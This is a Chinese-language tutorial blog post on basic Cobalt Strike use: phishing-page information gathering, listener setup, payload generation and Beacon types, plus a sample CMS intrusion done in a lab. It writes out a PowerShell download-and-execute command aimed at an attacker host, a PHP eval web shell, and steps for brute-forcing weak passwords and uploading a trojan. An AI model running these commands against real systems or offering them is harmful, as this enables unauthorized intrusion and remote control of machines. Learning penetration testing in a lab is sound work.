深入浅出带你学习CobaltStrike基本使用

XINO
668 阅读4分钟

持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第13天,点击查看活动详情

引文

最近在学习内网入门,在渗透测试用到了一个比较经典而且实用工具CobaltStrike,本文就顺着我学习的路线带大家简单学习一下该工具的原理以及用法。

简介

Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。是渗透中非常常见的一个工具,Cobalt Strike 主要用于团队作战,可谓是团队渗透神器,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。下面给大家带来CS的基本使用方法。

基本知识

官网:www.cobaltstrike.com/

安装

CS的安装是非常简单的,分为客户端和服务端,可分布式操作、协同作战。这次我们讲一下客户端的安装与登录,客户端在Windows、Linux、都可以运行不过我们需要配置好JAVA环境,才可以使用,登陆界面如下:

InkedCS.jpg

输入服务端的IP以及端口、连接密码,用户名可以任意设置。设置完之后我们点击连接,进入主视图:

InkedCS1.jpg

信息收集

工具提供了构造钓鱼网站的功能,具体选项如下:攻击->web钓鱼->信息收集.

Inkedcs2.jpg

本地URL端口随意设置,构造跳转URL为百度,生成构造连接,受害者访问时跳转百度网站,同时攻击记录应用信息。例如下面一个用户点击了钓鱼网站,返回如下信息:

Inkedcs3.jpg

上线CS

学完了上面的基础知识,接下来带给大家CS上线操作。

基本步骤

  1. 设置监听器(Linster)
  1. 生成攻击载荷(Payload)
  1. 目标机器(Victim)运行,上线cs

第一步,设置监听:

在CS图形化页面耳机图标配置监听,进入设置页面:

Inkedcs4.jpg

设置监听端口以及http地址开始监听,接下来我们要生成攻击负荷。

第二步,设置监听:生成攻击载荷(Payload)

常用的生成路径:

攻击->钓鱼攻击->web脚本传递

Inkedcs5.jpg

生成攻击连接,在受害者机器上去运行。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.1.200.41:81/a'))"

第三步,目标机器(Victim)运行,上线cs

这里就不多说了,我们在目标靶机上运行脚本,来上线机器。

Inkedcs6.jpg

Beacon

Beacon是CS运行在目标主机上的payload,Beacons是在隐蔽信道上给我们提供服务,用于长期控制受感染主机。它们可以具体分为以下几种:

DNS Beacon
DNS的payload,将域名解析到团队服务器,通过DNS的方式通信,比较隐蔽
HTTP和 HTTPS Beacon(差不多)
HTTP Beacon利用HTTP请求来进行通信向受害主机传达命令,控制对方主机。缺点是明文传输
HTTPS Beacon 增加了加密传输,其余跟HTTP完全相同
SMB Beacon
目标机使用命名管道与一个父Beacon(已上线主机)进行通信,在由这个父Beacon与CS团队服务端通信。Windows可以将命名管道通信封装在SMB协议中与远程主机进行通信
TCP Beacon
TCP Beacon使用TCP socket与父Beacon进行通信,流量都是明文的,容易被发现。在内网穿透的时候一般只能使用TCP Beacon生成木马

渗透实例

假如我们正在渗透一个网站,我们可以向网站上传一句话木马。举一个经典cms框架渗透流程:

扫描目录发现源码泄露找到后台: 这里我使用的是dirsearch工具

#git clone https://github.com/maurosoria/dirsearch
#cd dirsearch/
#python3 dirsearch.py -u "http://localhost/" -e *

我们扫描到了管理员后台

/index.php?r=admin

爆破发现存在弱口令admin/123456,我们进入后台,发现可以自定义前端模板,于是我们创建php文件去写一句话木马,我们在模板处构造一句话木马:

<?php eval($_POST[XINO]);?>

在扫描目录时,我们发现了网站备份源码,经过审计源码,发现文件上传路径为:

yxcms/protected/apps/default/view/default/xino.php

找到文件上传路径了,就可以用菜刀或者蚁剑去连接该路径的shell,下面就到了我们本节重点

前置条件我们已经连上了蚁剑。

靶机为windows系统,因此用cs生成一个windows可执行木马。

image.png

因为我们已经连上了蚁剑,可以下载插件利用上传功能去上传该木马,右键终端打开执行。发现主机上线成功进行后渗透操作。

Inkedcs6.jpg

结语

今天比较详细的讲了CS上线目标靶机的原理以及应用方法,至于剩下的后渗透操作以后再讲。CS工具对于渗透来说还是比较重要而且实用的,可能刚开始学不太好理解。有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。

avatar
文章
阅读
粉丝